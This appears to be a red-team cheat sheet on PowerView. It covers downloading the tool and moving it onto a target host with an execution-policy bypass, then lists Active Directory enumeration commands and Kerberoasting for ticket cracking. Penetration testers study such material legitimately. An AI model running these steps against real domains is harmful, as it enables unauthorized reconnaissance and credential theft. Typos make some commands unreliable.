PowerView


What is PowerView?

PowerView is a powershelll-based tool for gaining network situational awarness on windows domains

  • It acts as a powershelll alternative to net* commands

  • Leverages powershelll AD hooks and underlying Win32 API functions to interact with Active Directory.

  • Ideal for reconnaissance and privilege escalation during red team engagement


Setup

  1. Download PowerView

mkdir /opt/ADtools
cd /opt/ADtools
wget https://raw.githubusercontent.com/powershelllMafia/PowerSploit/master/Recon/Powerview.ps1
  1. Host PowerView using python HTTP server

python3 -m http.server
  1. Transfer PowerViewto target Machine

powershelll (New-Object System.Net.WebClient).DownloadFile('url','PowerView.ps1')
  1. Execute Policy Bypass

powershelll -nop -ep bypass
  1. Import PowerView

To load all PowerView functions into the currentsessions:

Import-Module .\PowerView.ps1

To execute the script directly without importing the functions:

./PowerView.ps1

Active Directory Enumeration

Domain Enumerstion

  • Get Domain info

Get-Domain
Get-NetDomain
  • Get domain SID

Get-DomainSID
  • Get domain controllers:

Get-NetDomainController
Get-DomainController
Get-Domain -Domain infosecwarrior.local

User Enumeration

  • List all users

Get-NetUser
  • Get Abstract list of users:

Get-NetUser | select cn
  • Get user principal names:

Get-NetUser | select userprincipalname
  • get specific user details

Get-NetUser -UserName DevNull
  • Get a list of users in the current domain

Get-DomainUser
Get-DomainUser -Identify DevNull
Get-DomainUser | select samaccountname
Get-DomainUser | select samaccountname,logonCount
  • Get list of all properties for a user

Get-DomainUser -Identify DevNull -Properties *
Get-DomainUser -Properties samaccountname,logonCount
  • Search a specific string in a user's attribute

Get-DomainUser -LDAPFilter "Description=*built*" | Select naem,Description

Group Enumeration

  • List all group

Get-NetGroup
Get-NetGroup -Domain infosecwarrior.local
Get-NetGroup -AdminCount
  • List group members

Get-DomainFroupMember "Domain Admins"
  • Get group members

Get-NetGroupMember -GroupName "administrators"
  • List local groups on a machine

Get-NetLocalGroup -ComputerName WC01
  • Get members of a specific local group ("Administrators") on a machine

Get-NetLocalGroupMember -ComputerName WC01 -GroupName Administrators
  • Get domain groups and membership

Get-DomainGroup
Get-DomainGroup -Domain infosecwarrior.local
Get-DomainGroup *admin* | select Name
Get-DomainGroup *admin* -Domain infosecwarrior.local | select Name
  • Get all members of the "Domain Admins" group (including nested groups)

Get-DomainGroupMember -Identity "Domain Admins" -Recurse
  • Equivalent with AD client

Get-ADGroupMember -Identity "Domain Admins" -Recurse
  • Get the group membership for a specifc user

Get-DomainGroup -UserName "DevNull"
  • Equivalent with AD cmdlet

Get-ADPrincipalGroupMembership -Identity Devnull

Computer Enumeration

  • List all computers

Get-NetComputer
Get-NetComputer -Ping
Get-NetComputer | select cn, operatingsystem
  • Get a list of all computers in trhe current domain

Get-DomainComputer | select Name
Get-DomainComputer | select dnshostname
Get-DomainComputer | select dnshostname, logonCount 
Get-DomainComputer | select Name, dnshostname, logonCount 
  • Get a list of all computers in the current domain

Get-DomainComputer | select -ExpandProperty dnshostname 
  • Get computers running a specific OS

Get-DomainComputer -OperatingSystem "*Server 2022*"
  • Ping all discovered computer

Get-DomainComputer -Ping

Advanced Group and GPO Enumeration

  • Find GPO linked to a specific domain

Get-DomainGPO -Domain infosecwarrior.local
  • Get domain policies

Get-DomainPolicy
Get-DomainPolicyData -Policy DefaultDomainPolicy
Get-DomainPolicyData -Policy DomainControllerPolicy

Session and Logon Enumeration

  • Find localadmin access

Find-localAdminAccess
  • Get logged on users

Get-NetLoggedOn -ComputerName DC01.infosecwarrior.local
Get-LastLoggedOn -ComputerName DC01.infosecwarrior.local
Get-NetRDPSession -ComputerName DC01.infosecwarror.local
Get-LoggedOnLocal -Computername WC01

Network Share and File Discovery

  • Find shares on hosts in current domain

Invoke-ShareFinder -Verbose
  • Find sensitive files on computers in the domain

Invoke-FileFinder -Verbose
  • Get all file servers of the domain

Get-NetFileServer

Attack Techniques

kerberosting

Request and extract Service Principal Names (SPN) tickets for cracking

Invoke-Kerberoast

Admin Privilege Hunting

Find local admin access

invoke-EnumerateLocalAdmin

Network Share Discovery

identify network shares

Invoke-ShareFinder

Last updated